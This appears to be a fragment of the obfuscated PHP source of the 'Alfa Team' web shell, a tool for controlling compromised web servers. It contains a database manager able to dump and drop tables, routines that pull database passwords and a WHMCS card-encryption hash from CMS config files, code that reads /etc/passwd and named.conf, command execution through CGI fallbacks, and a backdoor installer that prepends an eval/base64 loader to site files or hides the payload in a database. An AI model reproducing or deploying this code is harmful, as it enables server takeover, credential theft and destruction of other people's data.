__alfa_set_cookie("alfacgiapi", $lang); } if (@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)) { $out = $res[1]; } } elseif ($lang == "perl") { return _alfa_cgicmd($cmd_pure, "py", $set_cookie); } elseif ($lang == "py") { return _alfa_cgicmd($cmd_pure, "bash", $set_cookie); } elseif ($lang == "bash" && $GLOBALS["sys"] == "win") { return _alfa_cgicmd($cmd_pure, "aspx", $set_cookie); } else { if ($set_cookie) { __alfa_set_cookie("alfacgiapi_mode", "off"); } } return trim($out); } else { return ''; } } goto BIHg8; CUIqF: $default_use_ajax = true; goto vo0SR; fAaD3: $aztJtafUXm = "cha" . "r" . "C" . "o" . "d" . "e" . "A" . "t" . ''; goto mG6El; NOAKT: function Alfa_Create_A_Tag($action, $vals) { $nulls = array(); foreach ($vals as $key => $val) { echo "<a href=javascript:void(0) onclick="g('" . $action . "',"; for ($i = 1; $i <= $val[1] - 1; $i++) { $nulls[] = "null"; } $f = implode(",", $nulls); echo $f . ",'" . $val[0] . "');return false;">| " . $key . " | </a>"; unset($nulls); } } goto I2i3T; LUHcx: function alfaGetDomains($state = false) { $state = "named.conf"; $lines = array(); $lines = _alfa_file("/etc/named.conf"); if (!$lines) { $lines = @scandir("/etc/valiases/"); $state = "valiases"; if (!$lines) { $lines = @scandir("/var/named"); $state = "named"; if (!$lines && $state) { $lines = _alfa_file("/etc/passwd"); $state = "passwd"; } } } return array("lines" => $lines, "state" => $state); } goto NKFok; V1ePl: function _alfa_symlink($target, $link) { $phpsym = function_exists("symlink"); if ($phpsym) { @symlink($target, $link); } else { alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'"); } } goto AkVgx; W3QA9: function alfaSql_manager_api() { $db = $_POST["alfa1"]; $type = $_POST["alfa2"]; $sql_count = $_POST["alfa3"] == "true" ? true : false; $db = @json_decode($db, true); $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]); @mysqli_set_charset($conn, "utf8"); if ($conn) { if ($type == "load_all_tables") { $tables = array(); $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('" . implode("','", $db["databases"]) . "');"); $count = 0; while ($row = @mysqli_fetch_assoc($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row["table_schema"] . "`.`" . $row["table_name"] . "`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int) $count); } foreach ($db["databases"] as $db) { if (!isset($tables[$db])) { $tables[$db] = null; } } echo @json_encode($tables); } elseif ($type == "dump_drop") { if ($db["mode"] == "drop") { foreach ($db["tables"] as $table) { @mysqli_query($conn, "DROP TABLE `" . $table . "`;"); } $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . "`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int) $count); } echo @json_encode($tables); } else { if (strlen(alfaEx("mysqldump")) > 0) { alfaEx("mysqldump --single-transaction --host="" . $db["host"] . "" --user="" . $db["user"] . "" --password="" . $db["pass"] . "" " . $db["db"] . " " . implode(" ", $db["tables"]) . "  > " . $db["dump_file"]); } else { $fp = @fopen($db["dump_file"], "w"); foreach ($db["tables"] as $table) { $res = @mysqli_query($conn, "SHOW CREATE TABLE `" . $table . "`"); $create = @mysqli_fetch_array($res); $sql = "DROP TABLE IF EXISTS `" . $table . "`;\xa" . $create[1] . ";\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $tbl_data = @mysqli_query($conn, "SELECT * FROM `" . $table . "`"); $head = true; while ($item = @mysqli_fetch_assoc($tbl_data)) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "''"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysqli_real_escape_string($conn, $v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql = "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa\x9(" . implode(", ", $item) . ")"; $head = false; } else { $sql = "\xa	,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } if (!$head) { if ($fp) { fwrite($fp, ";

"); } else { echo ";\xa
"; } } } } echo @json_encode(array("status" => true, "file" => $db["dump_file"])); } } elseif ($type == "load_tables") { $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . "`"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int) $count); } echo @json_encode($tables); } elseif ($type == "alter") { $db["alter"]["type"] = strtolower($db["alter"]["type"]); $inputs = $db["alter"]["type"] . "(" . $db["alter"]["input"] . ")"; $text_input = array("longtext", "text", "mediumtext", "tinytext"); if (in_array($db["alter"]["type"], $text_input)) { $inputs = $db["alter"]["type"]; } @mysqli_query($conn, "ALTER TABLE `" . $db["table"] . "` MODIFY COLUMN `" . $db["column"] . "` " . $inputs); $error = @mysqli_error($conn); if ($error) { echo $error; } else { echo "ok"; } } elseif ($type == "edit" || $type == "delete" || $type == "delete_all") { if ($type == "edit") { $q = @mysqli_query($conn, "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` = '" . addslashes($db["key"]) . "' LIMIT 0,1"); $row = @mysqli_fetch_assoc($q); if ($row) { $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'"); $columns = array(); $edit_data = array(); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $input = array("col_type" => $row2["COLUMN_TYPE"]); $row2["type"] = strtolower($row2["type"]); switch ($row2["type"]) { case "longtext": case "text": case "mediumtext": case "tinytext": $input["tag"] = "textarea"; break; case "int": case "smallint": case "bigint": case "tinyint": case "mediumint": $input["tag"] = "input"; $input["type"] = "number"; break; default: $input["tag"] = "input"; $input["type"] = "text"; } $columns[$row2["name"]] = $input; } foreach ($row as $key => $v) { $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, "UTF-8"), "type" => $columns[$key]); } echo @json_encode($edit_data); } } else { if ($type == "delete_all") { $rows = implode("', '", $db["rows"]); } else { $rows = addslashes($db["key"]); } $query = "DELETE FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` IN ('" . $rows . "')"; @mysqli_query($conn, $query); $error = @mysqli_error($conn); if ($error) { $status = false; } else { $status = true; } echo @json_encode(array("status" => $status, "error" => $error, "query" => $query)); } } elseif ($type == "update") { $query = "UPDATE `" . $db["db"] . "`.`" . $db["table"] . "` SET "; foreach ($db["data"] as $col => $val) { $query .= "`" . $col . "` = '" . mysqli_real_escape_string($conn, $val) . "',"; } $query = substr($query, 0, -1); $query .= "WHERE `" . $db["col_key"] . "` = '" . $db["key"] . "'"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); } elseif ($type == "insert") { $query = "INSERT INTO `" . $db["db"] . "`.`" . $db["table"] . "` "; foreach ($db["data"] as $col => $val) { $cols .= $col . ","; $vals .= "'" . mysqli_real_escape_string($conn, $val) . "',"; } $cols = substr($cols, 0, -1); $vals = substr($vals, 0, -1); $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); } else { $pages = 0; $title = false; $query = ''; $tbl_content = "<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">"; $line = 0; $tables = array(); $columns = array(); if ($type == "load_data") { $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT 0,30"; $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $db["db"] . "`.`" . $db["table"] . "`"); $tbl_count = @mysqli_fetch_row($tbl_count_q); $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'"); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $columns[] = $row2; } if ($tbl_count[0] > 30) { $pages = ceil($tbl_count[0] / 30); } } elseif ($type == "query") { $query = $db["query"]; } elseif ($type == "page") { $db["page"] = (int) $db["page"] - 1; $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT " . $db["page"] * 30 . ",30"; } elseif ($type == "search") { $search = ''; $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL"); foreach ($db["search"] as $col => $val) { $search_noval_r = in_array($val["opt"], $search_noval); if (empty($val["value"]) && !$search_noval_r) { continue; } if (strstr($val["opt"], "...") || $search_noval_r) { $val["opt"] = str_replace("...", $val["value"], $val["opt"]); $search .= $col . " " . $val["opt"] . " AND "; } else { $search .= $col . " " . $val["opt"] . " '" . addslashes($val["value"]) . "' AND "; } } $search .= "1=1"; $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE " . $search; } $q_tables = @mysqli_query($conn, $query); if (!$q_tables) { echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query)); return false; } $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($db["db"]) . "' AND TABLE_NAME = '" . @addslashes($db["table"]) . "' AND COLUMN_KEY = 'PRI'"); if ($col_key) { $col_key = @mysqli_fetch_row($col_key); $col_key = $col_key[0]; if (!empty($col_key)) { $tbl_content = "<div style="margin-bottom:5px;margin-top:5px;"><button col_key="" . $col_key . "" tbl_name="" . $db["table"] . "" db_id="" . $db["db_id"] . "" \x9db_target="" . $db["db"] . "" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">"; } } else { $col_key = false; } while ($item = @mysqli_fetch_assoc($q_tables)) { if (!$title) { $tbl_content .= "<tr style="background-color:#305b8e;">"; if ($col_key) { $tbl_content .= "<th style="width: 55px;text-align:center;"><input db_id="" . $db["db_id"] . "" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>"; } foreach ($item as $key => $value) { $tbl_content .= "<th>" . $key . "</th>"; } reset($item); $title = true; $tbl_content .= "</tr><tr>"; } if ($col_key) { $cacheMsg = "<td style="text-align:center;"><input row_id="" . $line . "" type="checkbox" name="tbl_rows_checkbox[]" value="" . $item[$col_key] . ""></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="" . $db["db_id"] . "" db_target="" . $db["db"] . "" tbl_name="" . $db["table"] . "" col_key="" . $col_key . "" key="" . $item[$col_key] . "" onclick="alfaMysqlEditRow(this, 'edit');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="" . $db["db_id"] . "" db_target="" . $db["db"] . "" tbl_name="" . $db["table"] . "" col_key="" . $col_key . "" key="" . $item[$col_key] . "" row_id="" . $line . "" onclick="alfaMysqlEditRow(this, 'delete');" style="color:#ff1e1e;">Delete</a></td>"; } $tbl_content .= "<tr class="tbl_row tbl_row_l" . $line . "">" . $cacheMsg; $line++; foreach ($item as $key => $value) { if ($value == null) { $tbl_content .= "<td><i>null</i></td>"; } else { $tbl_content .= "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } $tbl_content .= "</tr>"; } $tbl_content .= "</table>"; if (!$title) { $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>"; } echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query)); } @mysqli_close($conn); } } goto ROY6n; It5ls: if (!$CWppUDJxuf("b" . "a" . "se64" . "_en" . "c" . "ode" . '')) { function vcnvSCZgBz($data) { if (empty($data)) { return; } $b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; $ac = 0; $enc = ''; $tmp_arr = array(); if (!$data) { return $data; } do { $o1 = $aztJtafUXm($data, $i++); $o2 = $aztJtafUXm($data, $i++); $o3 = $aztJtafUXm($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 63; $h2 = $bits >> 12 & 63; $h3 = $bits >> 6 & 63; $h4 = $bits & 63; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); $enc = implode($tmp_arr, ''); $r = strlen($data) % 3; return ($r ? substr($enc, 0, $r - 3) : $enc) . substr("===", $r || 3); } function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } function charAt($data, $char) { return substr($data, $char, 1); } } else { function vcnvSCZgBz($s) { $b = "b" . "a" . "se64" . "_en" . "c" . "ode" . ''; return $b($s); } } goto L1x_B; TLuCO: @ignore_user_abort(true); goto pHU3v; u4yR4: @ini_set("error_log", NULL); goto rUSPf; vo0SR: $default_charset = "Windows-1251"; goto uKA69; kavzq: function alfaWriteTocgiapi($name, $source) { $temp = ''; $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa"); if (in_array($name, $not_api)) { $temp = ALFA_TEMPDIR; if ($temp) { @chdir($temp); } } else { alfaCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __ALFA_DATA_FOLDER__); } @mkdir("alfacgiapi", 493); __write_file("alfacgiapi/" . $name, __get_resource($source)); @chmod("alfacgiapi/" . $name, 493); return $temp; } goto pr1zO; Q03qj: function alfaGetConfig() { $cms = $_POST["alfa1"]; $path = trim($_POST["alfa2"]); $config = array("wp" => array("file" => "/wp-config.php", "host" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_HOST(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbname" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_NAME(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbuser" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_USER(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbpw" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_PASSWORD(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "prefix" => array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,};/", 1)), "drupal" => array("file" => "/config.php", "host" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_HOSTNAME(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbname" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_DATABASE(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbuser" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_USERNAME(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "dbpw" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_PASSWORD(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1), "prefix" => array("/define[ ]{0,}\([ ]{0,}(?:'|")DB_PREFIX(?:'|")[ ]{0,},[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,}\)[ ]{0,};/", 1)), "drupal2" => array("file" => "/sites/default/settings.php", "host" => array("/(?:'|")host(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,},/", 1), "dbname" => array("/(?:'|")database(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,},/", 1), "dbuser" => array("/(?:'|")username(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,},/", 1), "dbpw" => array("/(?:'|")password(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,},/", 1), "prefix" => array("/(?:'|")prefix(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")[ ]{0,},/", 1)), "vb" => array("file" => "/includes/config.php", "host" => array("/config\[(?:'|")MasterServer(?:'|")\]\[(?:'|")servername(?:'|")\](\s+)=(\s+)(?:'|")(.*?)(?:'|")[ ]{0,};/", 3), "dbuser" => array("/config\[(?:'|")MasterServer(?:'|")\]\[(?:'|")username(?:'|")\](\s+)=(\s+)(?:'|")(.*?)(?:'|")[ ]{0,};/", 3), "dbname" => array("/config\[(?:'|")Database(?:'|")\]\[(?:'|")dbname(?:'|")\](\s+)=(\s+)(?:'|")(.*?)(?:'|")[ ]{0,};/", 3), "dbpw" => array("/config\[(?:'|")MasterServer(?:'|")\]\[(?:'|")password(?:'|")\](\s+)=(\s+)(?:'|")(.*?)(?:'|")[ ]{0,};/", 3), "prefix" => array("/config\[(?:'|")Database(?:'|")\]\[(?:'|")tableprefix(?:'|")\](\s+)=(\s+)(?:'|")(.*?)(?:'|")[ ]{0,};/", 3)), "phpnuke" => array("file" => "/config.php", "host" => array("/dbhost(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/dbname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/dbuname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/dbpass(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "smf" => array("file" => "/Settings.php", "host" => array("/db_server(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/db_name(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/db_user(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/db_passwd(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/db_prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "whmcs" => array("file" => "/configuration.php", "host" => array("/db_host(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/db_name(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/db_username(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/db_password(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "cc_encryption_hash" => array("/cc_encryption_hash(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "joomla" => array("file" => "/configuration.php", "host" => array("/\$host(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/\$db(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/\$user(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/\$password(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/\$dbprefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "phpbb" => array("file" => "/config.php", "host" => array("/dbhost(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/dbname(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/dbuser(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/dbpasswd(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/table_prefix(\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3)), "mybb" => array("file" => "/inc/config.php", "host" => array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbname" => array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbuser" => array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "dbpw" => array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3), "prefix" => array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|")(.*?)(?:'|");/", 3))); if ($cms == "drupal") { $file = $config[$cms]["file"]; $file = $path . $file; if (@is_file($file) || _alfa_is_dir($file, "-e")) { } else { $cms = "drupal2"; } } if ($cms == "vb") { $file = $config[$cms]["file"]; $file = $path . $file; if (@is_file($file) || _alfa_is_dir($file, "-e")) { } else { $path .= "/core"; } } $data = array(); $srch_host = $config[$cms]["host"][0]; $srch_user = $config[$cms]["dbuser"][0]; $srch_name = $config[$cms]["dbname"][0]; $srch_pw = $config[$cms]["dbpw"][0]; $prefix = $config[$cms]["prefix"][0]; $file = $config[$cms]["file"]; $chost = $config[$cms]["host"][1]; $cuser = $config[$cms]["dbuser"][1]; $cname = $config[$cms]["dbname"][1]; $cpw = $config[$cms]["dbpw"][1]; $cprefix = $config[$cms]["prefix"][1]; if (@is_dir($path) || _alfa_is_dir($path)) { $file = $path . $file; } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) { $file = $path; } else { return false; } $file = __read_file($file); if ($cms == "drupal2") { $file = preg_replace("/\@code(.*?)\@endcode/s", '', $file); } elseif ($cms == "vb") { $file = preg_replace("/right of the(.*?)BAD!/s", '', $file); } if (preg_match($srch_host, $file, $mach)) { $data["host"] = $mach[$chost]; } if (preg_match($srch_user, $file, $mach)) { $data["user"] = $mach[$cuser]; } if (preg_match($srch_name, $file, $mach)) { $data["dbname"] = $mach[$cname]; } if (preg_match($srch_pw, $file, $mach)) { $data["password"] = $mach[$cpw]; } if (isset($prefix)) { if (preg_match($prefix, $file, $mach)) { $data["prefix"] = $mach[$cprefix]; } } if ($cms == "whmcs") { if (preg_match($config[$cms]["cc_encryption_hash"][0], $file, $mach)) { $data["cc_encryption_hash"] = $mach[3]; } } echo json_encode($data); } goto iD68t; SXwEV: function is_ipv4($ip) { return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : "(Null)"; } goto qr6DC; BIHg8: function alfaGetCwd() { if (function_exists("getcwd")) { return @getcwd(); } else { return dirname($_SERVER["SCRIPT_FILENAME"]); } } goto HL3qe; TdVrb: function get_pagination_links($current_page, $total_pages) { $links = ''; if ($total_pages >= 1 && $current_page <= $total_pages) { $links .= "<a onclick="pageChangedFilesMan(this);" class="page-number"><<</a>"; $selected_page = ''; if ($current_page == 1) { $selected_page = " active-page-number"; } $links .= "<a onclick="pageChangedFilesMan(this);" class="page-number" . $selected_page . "">1</a>"; $i = max(2, $current_page - 5); if ($i > 2) { $links .= "<a class="page-number">...</a>"; } for (; $i < min($current_page + 6, $total_pages); $i++) { if ($i == $current_page) { $selected_page = " active-page-number"; } else { $selected_page = ''; } $links .= "<a onclick="pageChangedFilesMan(this);" class="page-number" . $selected_page . "">{$i}</a>"; } if ($i != $total_pages) { $links .= "<a class="page-number">...</a>"; } $selected_page = " last-page-number"; if ($current_page == $total_pages) { $selected_page .= " active-page-number"; } $links .= "<a onclick="pageChangedFilesMan(this);" class="page-number" . $selected_page . "">{$total_pages}</a>"; $links .= "<a onclick="pageChangedFilesMan(this);" class="page-number">>></a>"; } return $links; } goto fhKEb; KFMZb: function alfainbackdoor() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g('inbackdoor',null,'file')">| In File | </a><a href=javascript:void(0) onclick="g('inbackdoor',null,'db')">| In DataBase | </a></h3></center>"; $error = "<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>"; $success = "<font color="green">Success...!"; $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php
	echo('Alfa Team is Here...!');\xa?></textarea></p></div>"; $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>"; $cwd = "Example: /home/alfa/public_html/index.php"; if ($_POST["alfa1"] == "file") { echo "<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit="g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>"; if ($_POST["alfa2"] != '' && $_POST["alfa3"] != '' && $_POST["alfa4"] != '') { $method = $_POST["alfa2"]; $file = $_POST["alfa3"]; $shell = $_POST["alfa4"]; $key = str_replace(array(""", "'"), '', trim($_POST["alfa5"])); if ($key == '') { $key = "alfa"; } if ($method == "my") { $shell = __ZW5jb2Rlcg($shell); } else { $shell = $GLOBALS["__ALFA_SHELL_CODE"]; } $code = "<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="" . $key . ""){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("" . $shell . "");exit;}?>"; if (@is_file($file) && @is_writable($file)) { @file_put_contents($file, $code . "
" . @file_get_contents($file)); __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . "</font>"); } else { __alert($error); } } } if ($_POST["alfa1"] == "db") { echo "<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml("all") . "<p><form onsubmit="g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Backdoor Loader: ", "inputName" => "file", "inputValue" => $cwd, "inputSize" => "50", "placeholder" => true), "td6" => array("color" => "FFFFFF", "tdName" => "Key: ", "inputName" => "key", "inputValue" => "alfa", "inputSize" => "50")); create_table($table); echo "<p>{$select}</p>"; echo $textarea; echo "<p><input type='submit' value=' '></p></form></p></center>"; if ($_POST["alfa2"] != '' && $_POST["alfa3"] != '' && $_POST["alfa5"] != '' && $_POST["alfa6"] != '') { $dbhost = $_POST["alfa2"]; $dbuser = $_POST["alfa3"]; $dbpw = $_POST["alfa4"]; $dbname = $_POST["alfa5"]; $file = $_POST["alfa6"]; $method = $_POST["alfa7"]; $shell = $_POST["alfa8"]; $key = str_replace(array(""", "'"), '', trim($_POST["alfa9"])); if ($key == '') { $key = "alfa"; } if ($method == "my") { $shell = __ZW5jb2Rlcg($shell); } else { $shell = $GLOBALS["__ALFA_SHELL_CODE"]; } if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) { $code = "<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="" . $key . ""){$conn=mysqli_connect("" . str_replace(""", "\"", $dbhost) . "","" . str_replace(""", "\"", $dbuser) . "","" . str_replace(""", "\"", $dbpw) . "","" . str_replace(""", "\"", $dbname) . "");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>"; if (@is_file($file) && @is_writable($file)) { @mysqli_query($conn, "DROP TABLE `alfa_bc`"); @mysqli_query($conn, "CREATE TABLE `alfa_bc` (code LONGTEXT)"); @mysqli_query($conn, "INSERT INTO `alfa_bc` VALUES("" . $shell . "")"); @file_put_contents($file, $code . "\xa" . @file_get_contents($file)); __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . "</font>"); } else { __alert($error); } } } } echo "</div>"; alfafooter(); } goto g2veP; B6o6w: function alfaCssLoadColors() { $css = ''; foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { if (!is_array($value)) { $value = alfa_getColor($key); $css .= ".{$key}{color: {$value};}"; } else { if 